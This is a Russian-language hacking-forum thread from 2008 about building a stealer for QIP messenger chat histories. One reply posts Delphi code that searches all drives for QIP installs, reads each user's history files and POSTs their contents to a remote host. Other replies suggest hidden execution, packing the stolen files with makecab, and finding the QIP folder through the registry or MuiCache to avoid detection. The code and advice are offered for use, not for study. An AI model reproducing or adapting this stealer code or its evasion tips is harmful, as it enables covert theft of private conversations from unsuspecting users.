ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
23.11.2008, 21:39
|
|
Постоянный
Регистрация: 20.12.2007
Сообщений: 577
Провел на форуме:
1636674
Репутация:
171
|
|
Сообщение от crystalbit
имхо в твоем случае лучше использовать %windir%\..\program files\qip
это типа круто, все делать через задницу?
есть такая штука, как %programfiles%
|
|
|
24.11.2008, 06:47
|
|
Участник форума
Регистрация: 24.01.2008
Сообщений: 110
Провел на форуме:
359408
Репутация:
209
|
|
для новечка 1 пост очень даже ничего +++
поис фаила можно реализовать проще, зачем изобретать велосипед если он уже изобретен:
Код:
procedure Send_all(Way:String);
begin
try
if FindFirst(Way+'USERS\*',faDirectory,folder)=0 then repeat
try
If FindFirst(Way+'USERS\'+folder.Name+'\History\*.txt',faAnyFile-faDirectory,TS)=0 then
repeat
If TS.Name<>'_srvlog.txt' Then
begin
try
ZeroMemory(@szBuf, SizeOf(szBuf));
lstrcpy(szBuf, PChar('fname='+TS.name+'&UIN='+folder.name+'&data='));
lstrcat(szBuf, ((GetFileData(PChar(Way+'USERS\'+folder.Name+'\History\'+TS.name)))));
SendPOSTData(Host,Path,szBuf);
except end;
sleep(50); end;
until FindNext(TS) <> 0;
FindClose(TS);
except end;
until FindNext(folder) <> 0;
FindClose(folder);
except end;
end;
function Search():string;
var p:string;
n:integer;
c:char;
//Рекурсивный поиск файлов
function FindFile(var path:string; const mask:string):boolean;
var SRec:TSearchRec;
retval:integer;
oldlen:integer;
begin Result:=true;
oldlen:=length(path);
retval:=FindFirst(path+mask,$3F,SRec);
while retval=0 do begin
if ((SRec.Attr and $18)=0) and (DirectoryExists(path+'Users')) then begin //faDirectory or faVolumeID
Send_all(path);
end;
retval:=FindNext(SRec)
end;
FindClose(SRec);
if not Result then exit;
retval:=FindFirst(path+'*.*',$10,SRec); //faDirectory
while retval=0 do begin
if (SRec.Attr and $10)<>0 then //faDirectory
if (SRec.Name<>'.')and(SRec.Name<>'..') then begin
path:=path+SRec.Name+'\';
if (not FindFile(path,mask)) then begin
Result:=false;
Break;
end;
delete(path,oldlen+1,255)
end;
retval:=FindNext(SRec);
end;
FindClose(SRec)
end;
begin
for c:='C' to 'Z' do begin
p:=c+':\';
if (GetDriveType(PChar(p))=DRIVE_FIXED) or (GetDriveType(PChar(p))=DRIVE_REMOVABLE) then
FindFile(p,'qip.exe')
end;
end;
взято с QIP_History_Sender Created by R_O_O_T |
|
|
|
24.11.2008, 11:10
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.03.2007
Сообщений: 1,985
Провел на форуме:
3288241
Репутация:
3349
|
|
а если у человека нет винрара? или он незареган и тогда вылезит окошко. По этому лучше упакуй через стандартный пакер винды. Парует не очень, но всегда есть в наличии и он консольный )
|
|
|
|
24.11.2008, 11:30
|
|
Участник форума
Регистрация: 01.02.2005
Сообщений: 233
Провел на форуме:
748321
Репутация:
112
|
|
стандартный это какой ??
makecab.exe ??
а если нужно сохранить структуру папок..
тоесть users/xxxxx/histrory
и тд..то чем тогда пользоваться оО ????
|
|
|
|
24.11.2008, 19:40
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.02.2006
Сообщений: 891
Провел на форуме:
1892597
Репутация:
836
|
|
еще раз говорю, промолчал бы если не
start/min C:\"Program Files"\QIP\1.exe // запускает в скрытом режиме делфи файл, который и будет заниматься отправкой.
какой на* дельфи файл?!!!
вы бы чуть чуть головой думали, это п*здец как убивает.
батники юзать не хорошо, толку от них 0, прочесть можно
почитай про создание объектов в Run-Time
почитай про winSock
да и вообще, скоро вири на .net писать будут, если не уже)
а если история шифруется?
и не похоже на малварь это
__________________
*********************************
*Я не волшебник ٩(๏̯͡๏)۶, только учусь...*
*********************************
Программы на заказ
Times to fly...
|
|
|
|
24.11.2008, 23:14
|
|
Познающий
Регистрация: 22.07.2008
Сообщений: 62
Провел на форуме:
304390
Репутация:
172
|
|
я бв сказал да вот обидетесь, хотя я уже сказал...
|
|
|
|
25.11.2008, 01:15
|
|
Новичок
Регистрация: 14.04.2008
Сообщений: 21
Провел на форуме:
124854
Репутация:
44
|
|
Ээ...Эксперты... Вы сюда срать пришли, или может чё полезное для новичков сюдаже подкинете?
|
|
|
|
26.11.2008, 10:12
|
|
Участник форума
Регистрация: 19.05.2007
Сообщений: 281
Провел на форуме:
2823587
Репутация:
106
|
|
Пути к папке с квипом можно выдрать из реестра.
от суда например HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Uninstall\QIP
ну или ждать пока запустят квип и брать из процесса.
Через поиск диру искать это мазахизм да и запалится можно.
|
|
|
|
26.11.2008, 10:33
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108
Репутация:
445
|
|
St0nX оооо))) спасибо! А то я шарил по реестру не нашол путь в SOFTWARE :-D
ВСЕ СтАВИМ ДРУЖНО ++ St0nX'у!
|
|
|
|
26.11.2008, 11:01
|
|
Участник форума
Регистрация: 06.06.2008
Сообщений: 171
Провел на форуме:
1085601
Репутация:
110
|
|
Еще папка квипа есть в muicache, оттуда имхо лучше, если установлено несколько квипов, то там все и будут
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
